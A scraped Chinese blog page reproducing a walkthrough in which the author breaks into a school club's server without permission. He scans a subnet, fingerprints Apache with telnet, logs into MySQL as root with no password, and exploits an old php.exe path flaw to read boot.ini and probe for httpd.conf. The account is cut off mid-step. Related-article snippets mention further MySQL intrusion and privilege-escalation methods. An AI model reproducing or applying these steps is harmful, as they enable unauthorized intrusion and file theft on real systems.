通过mysql命令 入侵_通过mysql的入侵全过程.doc

最新推荐文章于 2022-11-16 14:47:02 发布
最新推荐文章于 2022-11-16 14:47:02 发布
阅读量357 收藏
点赞数
文章标签: 通过mysql命令 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29322049/article/details/113166581
版权

您所在位置:网站首页 > 海量文档

&nbsp>&nbsp计算机&nbsp>&nbspPHP资料

7e3e25dd1884ce9b7725a69a698d5758.gif

通过mysql的入侵全过程.doc7页

本文档一共被下载:2377011b61454b208b34ad77b4c31088.gif次,您可全文免费在线阅读后下载本文档。

072ad097814a33d1ad18e33ca14a5a9e.png

9ec2792a743ebdf4575ee09a03c275ea.png

7af312d1be2cfc1e59f15880bb7a7e7a.png

5f207613e329ca76dc87c76d3ff77e64.png

adf7aa3071c520b8a2063089f549261c.png

下载提示

1.本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。

2.该文档所得收入(下载+内容+预览三)归上传者、原创者。

3.登录后可充值,立即自动返金币,充值渠道很便利

今天生病了,没有去上自习,在寝室里睡觉,睡得头发胀,

实在睡不着了,还是找他机子练练手把,用superscan扫了一下

某个c类的网段,寻找开放80端口的机器,结果就只有一台机器

开放了80端口,试着连了一下,是我们学校某个社团的的主页。

从端口的banner来看应该是apache(win32),证实一下

telnet 211.87.xxx.xxx

get(回车)

501 Method

Not Implemented

Method Not Implemented

get to /index

.html not supported.

Invalid method in request get

Apache/1.3.2

2 Server at Port 80

遗失对主机的连接。

C:\>

呵呵,这下看得更清楚了

据我猜测,应该是“apache+mysql+php”的黄金组合吧

习惯性的mysql -h 211.87.xxx.xxx

果然连上了

Welcome to the MySQL monitor. Commands end with or \g.

Your MySQL connection id is 17 to server version: 3.23.53-max-nt

Type help; or \h for help. Type \c to clear the buffer.

mysql>

断开试着

mysql -h 211.87.xxx.xxx -u root -p

password:

Welcome to the MySQL monitor. Commands end with or \g.

Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or \h for help. Type \c to clear the buffer.

mysql>

呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。

这是相当的危险的,碰见这种情况,有99.999%的可能可以进入

既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了

呵呵

下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径?

方法有很多种,在这里我介绍2种方法供初学者参考

首先要告诉大家的是低版本的apache+php有一个漏洞

提交http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名

就可以把那个物理文件下载下来。

于是提交http://211.87.xxx.xxx/php/php.exe?c:\a.txt

返回

No input file specified. (没有这个漏洞的话提示找不到网页)

好的,这说明他有这个漏洞。

在提交http://211.87.xxx.xxx/php/php.exe?c:\boot.ini

返回

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating

systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"

/fastdetect

呵呵,装的还是xp。

好了,我们可以猜测对方apache的conf文件的物理位置了

http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf

No input file specified.

http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf

No input file specified.

http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf

No input file specified.

http://211.87.xxx.xxx/php/php.exe?c:\Program Files\apache\conf\httpd.conf

No input file specifie

发表评论

请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。

用户名:

验证码:

c9f2bced460b0329ba0aadbbc3f0fc71.png

匿名?

发表评论

A菲拉格慕(小艳子)
关注
【微服务】mysql + elasticsearch数据双写设计与实现
congge
11-04 8727
mysql + elasticsearch数据双写设计与实现
数据库审计方案样本.doc
11-21
- 全方位数据库审计:支持多种主流数据库系统,如Oracle、SQL Server、MySQL等,以及各种操作系统平台,提供跨平台的审计能力。 - 实时回放数据库操作:通过记录操作序列,可以实时或事后回放操作过程,帮助快速定位...
mysql 入侵_mysql5.0入侵测试以及防范方法分享
weixin_36349685的博客
01-18 209
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:grant all privileges on *.* to 数据库账...
mysql 5.0 入侵_mysql5.0入侵测试以及防范方法分享
weixin_35182280的博客
02-17 142
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:代码如下:grant all privileges on *.* to...
mysql命令入侵_My SQL防入侵方法大全_MySQL
weixin_39883208的博客
01-19 202
MYSQL用户ROOT密码为空时是一个很大的漏洞,在网上也有许多一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??后来,自己思索想到一个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe...
mysql入侵服务器_记通过mysql数据库成功入侵到服务器内部的渗透实战
weixin_33127399的博客
01-19 1249
1,在成功进入mysql到数据库之后,可以使用select user();命令,查看当前的用户,如果为root,则可以执行下一步操作。不为root,则需要通过其他方法提权。2, 使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况,如果没有开启,则使用下面...
MySql漏洞导致电脑被入侵(特征为新增加名为piress的帐户)所想到的
热门推荐
Simple life
08-22 2万+
题记 今天开机,突然发现新增了一个名为piress的账户,突然间就意识到我的电脑可能被入侵了。后来发现网上很多人都遇到这样的问题。经过一步步的查证,原来最近mysql爆出一个安全漏洞,远程登录mysql,尝试225次后就可以绕过身份验证登录到数据库。我很悲催,刚装上MySql就被别人扫描3306端口,然后远程种木马了…… 经过 1、网上搜索相似案例,然后F8进安全模式,删除pires
java_ssm日用品网站设计vue毕业论文.doc
08-06
本论文详细介绍了基于Java SSM框架和Vue.js的日用品网站设计与实现,从需求分析、技术选型、系统设计到实施测试,全面展示了项目的全过程。项目成果不仅适用于日用品在线销售,其设计思路和技术方案也可为其他类型的...
Windows 2003 安全加固.doc
07-06
本文档将详细介绍针对Windows 2003的安全加固措施,特别是关于硬盘权限的设置方法,旨在提升服务器的安全性,防止未经授权的访问、木马入侵以及提权攻击等。 #### 二、硬盘权限设置原则 在进行硬盘权限设置时,应...
基于springboot的大创管理系统源码数据库.doc
最新发布
03-10
- 项目申报管理、项目中检管理、项目结项管理、项目评审管理、专家评审管理:参与项目从申请到结项的全流程。 #### 五、系统设计要点 1. **系统功能设计**: - 需要对系统的各项功能进行详细规划,确保覆盖所有...
MYSQL入侵的一种思路
weixin_34187822的博客
11-12 275
(1)扫描MySQL口令,进行连接查看表中内容,结合web实施控制。 (2)执行vbs命令,将vbs命令写入到数据库表中,然后导入到启动中,不过这个目前还没有测试成功。网上有,但其脚本有问题。 (3)查看Mysql版本,通过可溢出工具直接溢出并提升权限。这个没有做,可以搜集资料作一些测试很研究。 本文转自 simeon2005 ...
对网易的一次入侵检测-可以看成是Jsp+mysql入侵
蓝法典的专栏
05-18 3219
已发表于黑客X档案BY 剑心[B.C.T]转载注明出处 163.com是国内一家比较出名的门户网站,提供包括邮箱等等在内的各种服务,这样繁多的服务,不知道会不会在哪些地方存在漏洞哦!正好最近学习了一些注入知识就想对这些门户网站做点小小的安全检测,不知道他们的脚本像不像他们名声一样那么厉害哦!废话就不说了,我们就去找那些传递参数的页面看看会不会不小心有那么一个参数没有过滤,那么我们就有空子可以钻了哦
mysql 5.0 入侵_Mysql跨库入侵介绍
weixin_42536863的博客
01-27 160
入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之….. (当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的,偶?跑题了。)大家知道在mysql5.0以后加入了 information_schemata 这个虚拟库,基本结构如下:Informa...
通过mysql入侵win主机_通过mysql入侵NT和win2000
weixin_28956181的博客
02-05 116
通过mysql入侵NT和win2000作者:网络 来源:佚名 更新时间:2008-02-08 13:09:04点击:0by coolweiscoolweis@netguard.com.cn许多nt和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而iis的一些其他漏洞导致源代码泄漏也可能看到...
Mysql数据库被入侵
无数个夜晚的博客
03-11 403
Mysql数据库被黑mysql 数据库只有RECOVER_DATABASES数据库密码简单导致Mysql数据库被黑 mysql 数据库只有RECOVER_DATABASES 数据库密码简单导致Mysql数据库被黑
如何入侵mysql数据库_如何创建数据库,如何利用弱口令入侵MySQL数据库
weixin_39770416的博客
01-19 441
导航:网站首页 >如何创建数据库,如何利用弱口令入侵MySQL数据库时间:2018-3-9相关问题:匿名网友:很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDFDLL中自写的Fu...
mysql提权入侵服务器_Mysql提权拿服务器
weixin_39606911的博客
02-02 484
最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。 接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。dedecms一般都在data目...
记一次mysql数据库被入侵
hehehehao1的博客
11-16 313
mysql数据库被盗
Sql注入_mysql权限入侵
weixin_30342827的博客
03-22 526
实验:测试不同数据库用户的操作权限 文件读写测试:load_file() ,into outfile 数据库用户账号密码存储在mysql.user下 Mysql最高权限用户root: Mysql普通权限用户test: 无权限文件读写 注入点数据库用户权限由什么决定? 连接数据库用户决定 Mysql注入点进行文件读写操作: 条件:root权限注入...
Linux下详述MySQL 8.0.x安装全过程与特性
6. **启动与初始化**:使用`sudo service mysql start`命令启动服务,首次运行时,系统会提示你创建root用户的密码。此外,还可以通过`mysql_secure_installation`来配置安全选项。 7. **创建数据库用户和权限**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值